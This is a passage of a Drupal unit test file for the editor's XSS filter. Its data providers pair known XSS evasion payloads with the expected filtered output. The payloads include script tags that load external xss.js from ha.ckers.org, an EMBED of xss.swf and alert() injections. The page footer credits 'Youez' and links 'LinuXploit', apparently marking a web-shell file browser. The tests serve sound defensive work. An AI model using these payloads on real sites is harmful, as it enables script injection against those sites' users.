    $data[] = ['&lt;SCRIPT =&quot;&gt;&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;', '&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&amp;gt;'];
    $data[] = ['&lt;SCRIPT a=&quot;&gt;&quot; \'\' SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;', '&quot; \'\' SRC=&quot;http://ha.ckers.org/xss.js&quot;&amp;gt;'];
    $data[] = ['&lt;SCRIPT &quot;a=\'&gt;\'&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;', '\'&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&amp;gt;'];
    $data[] = ['&lt;SCRIPT a=`&gt;` SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;', '` SRC=&quot;http://ha.ckers.org/xss.js&quot;&amp;gt;'];
    $data[] = ['&lt;SCRIPT a=&quot;&gt;\'&gt;&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;', '\'&amp;gt;&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&amp;gt;'];
    $data[] = ['&lt;SCRIPT&gt;document.write(&quot;&lt;SCRI&quot;);&lt;/SCRIPT&gt;PT SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;', 'document.write(&quot;&lt;SCRI&gt;PT SRC=&quot;http://ha.ckers.org/xss.js&quot;&amp;gt;'];

    // URL string evasion.
    // @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#URL_string_evasion
    // This one is irrelevant for Drupal; Drupal doesn't forbid linking to some
    // sites, it only forbids linking to any protocols other than those that are
    // whitelisted.

    // Test XSS filtering on data-attributes.
    // @see \Drupal\editor\EditorXssFilter::filterXssDataAttributes()

    // The following two test cases verify that XSS attack vectors are filtered.
    $data[] = ['&lt;img src=&quot;butterfly.jpg&quot; data-caption=&quot;&amp;lt;script&amp;gt;alert();&amp;lt;/script&amp;gt;&quot; /&gt;', '&lt;img src=&quot;butterfly.jpg&quot; data-caption=&quot;alert();&quot; /&gt;'];
    $data[] = ['&lt;img src=&quot;butterfly.jpg&quot; data-caption=&quot;&amp;lt;EMBED SRC=&amp;quot;http://ha.ckers.org/xss.swf&amp;quot; AllowScriptAccess=&amp;quot;always&amp;quot;&amp;gt;&amp;lt;/EMBED&amp;gt;&quot; /&gt;', '&lt;img src=&quot;butterfly.jpg&quot; data-caption=&quot;&quot; /&gt;'];

    // When including HTML-tags as visible content, they are double-escaped.
    // This test case ensures that we leave that content unchanged.
    $data[] = ['&lt;img src=&quot;butterfly.jpg&quot; data-caption=&quot;&amp;amp;lt;script&amp;amp;gt;alert();&amp;amp;lt;/script&amp;amp;gt;&quot; /&gt;', '&lt;img src=&quot;butterfly.jpg&quot; data-caption=&quot;&amp;amp;lt;script&amp;amp;gt;alert();&amp;amp;lt;/script&amp;amp;gt;&quot; /&gt;'];

    return $data;
  }

  /**
   * Tests the method for filtering XSS.
   *
   * @param string $input
   *   The input.
   * @param string $expected_output
   *   The expected output.
   *
   * @dataProvider providerTestFilterXss
   */
  public function testFilterXss($input, $expected_output) {
    $output = Standard::filterXss($input, $this-&gt;format);
    $this-&gt;assertSame($expected_output, $output);
  }

  /**
   * Tests removing disallowed tags and XSS prevention.
   *
   * \Drupal\Component\Utility\Xss::filter() has the ability to run in blacklist
   * mode, in which it still applies the exact same filtering, with one
   * exception: it no longer works with a list of allowed tags, but with a list
   * of disallowed tags.
   *
   * @param string $value
   *   The value to filter.
   * @param string $expected
   *   The string that is expected to be missing.
   * @param string $message
   *   The assertion message to display upon failure.
   * @param array $disallowed_tags
   *   (optional) The disallowed HTML tags to be passed to \Drupal\Component\Utility\Xss::filter().
   *
   * @dataProvider providerTestBlackListMode
   */
  public function testBlacklistMode($value, $expected, $message, array $disallowed_tags) {
    $value = Standard::filter($value, $disallowed_tags);
    $this-&gt;assertSame($expected, $value, $message);
  }

  /**
   * Data provider for testBlacklistMode().
   *
   * @see testBlacklistMode()
   *
   * @return array
   *   An array of arrays containing the following elements:
   *     - The value to filter.
   *     - The value to expect after filtering.
   *     - The assertion message.
   *     - (optional) The disallowed HTML tags to be passed to \Drupal\Component\Utility\Xss::filter().
   */
  public function providerTestBlackListMode() {
    return [
      [
        '&lt;unknown style=&quot;visibility:hidden&quot;&gt;Pink Fairy Armadillo&lt;/unknown&gt;&lt;video src=&quot;gerenuk.mp4&quot;&gt;&lt;script&gt;alert(0)&lt;/script&gt;',
        '&lt;unknown&gt;Pink Fairy Armadillo&lt;/unknown&gt;&lt;video src=&quot;gerenuk.mp4&quot;&gt;alert(0)',
        'Disallow only the script tag',
        ['script'],
      ],
      [
        '&lt;unknown style=&quot;visibility:hidden&quot;&gt;Pink Fairy Armadillo&lt;/unknown&gt;&lt;video src=&quot;gerenuk.mp4&quot;&gt;&lt;script&gt;alert(0)&lt;/script&gt;',
        '&lt;unknown&gt;Pink Fairy Armadillo&lt;/unknown&gt;alert(0)',
        'Disallow both the script and video tags',
        ['script', 'video'],
      ],
      // No real use case for this, but it is an edge case we must ensure works.
      [
        '&lt;unknown style=&quot;visibility:hidden&quot;&gt;Pink Fairy Armadillo&lt;/unknown&gt;&lt;video src=&quot;gerenuk.mp4&quot;&gt;&lt;script&gt;alert(0)&lt;/script&gt;',
        '&lt;unknown&gt;Pink Fairy Armadillo&lt;/unknown&gt;&lt;video src=&quot;gerenuk.mp4&quot;&gt;&lt;script&gt;alert(0)&lt;/script&gt;',
        'Disallow no tags',
        [],
      ],
    ];
  }

}
</pre><center><br>Youez - 2016 - github.com/yon3zu<br><a href='https://linuxploit.com/' target='_blank'>LinuXploit</a></center>